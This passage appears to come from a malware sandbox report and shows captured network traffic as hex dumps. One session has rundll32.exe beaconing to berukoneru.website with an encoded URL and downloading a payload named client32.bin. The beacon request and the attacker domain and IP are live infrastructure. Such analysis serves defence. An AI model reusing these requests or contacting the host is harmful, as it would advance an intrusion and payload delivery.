                            2021-12-14 09:21:39 UTC1508INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                            Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                            2021-12-14 09:21:39 UTC1524INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                            Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                            2021-12-14 09:21:39 UTC1540INData Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                            Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
                            2021-12-14 09:21:39 UTC1556INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                            Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                            2021-12-14 09:21:39 UTC1572INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                            Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                            2021-12-14 09:21:39 UTC1588INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                            Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
                            2021-12-14 09:21:39 UTC1604INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                            Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                            2021-12-14 09:21:39 UTC1620INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                            Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                            Session ID: 7 | Source IP: 192.168.2.6 | Source Port: 49820 | Destination IP: 79.110.52.144 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | kBytes transferred | Direction | Data
                            2021-12-14 09:21:39 UTC | 1627 | OUT | GET /tire/gzRMSfagaZDYqNWCuNWpBQY/d3QH3HcNtD/fG3zb1_2FY310Wc1Z/tU68j9ArrsrY/cG2nzLaOesJ/1fJaUxYEiS_2Fq/6VuTPCoO1fL43Db5nwE4B/eNIHObz48Uk8thb4/s2ZGHDbOs4GyVjB/HB5iQTw6wsHP9eF2fL/ehbbJ4i3G/wutxyBgCPuYINeY4btAA/_2FftqK8_2FJ53N0BbQ/E4DqjTtkOXgod/z7et.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:39 UTC | 1627 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:39 GMT
                            Content-Type: application/zip
                            Content-Length: 268426
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=vvpskej8dhpqjtcv2a9elais61; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:39 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:39 UTC1628INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                            Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                            2021-12-14 09:21:39 UTC1643INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                            Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                            2021-12-14 09:21:39 UTC1659INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                            Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                            2021-12-14 09:21:39 UTC1675INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                            Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                            2021-12-14 09:21:39 UTC1691INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                            Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                            2021-12-14 09:21:39 UTC1707INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                            Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                            2021-12-14 09:21:39 UTC1723INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                            Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                            2021-12-14 09:21:39 UTC1739INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                            Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                            2021-12-14 09:21:39 UTC1755INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                            Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                            2021-12-14 09:21:39 UTC1771INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                            Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                            2021-12-14 09:21:39 UTC1787INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 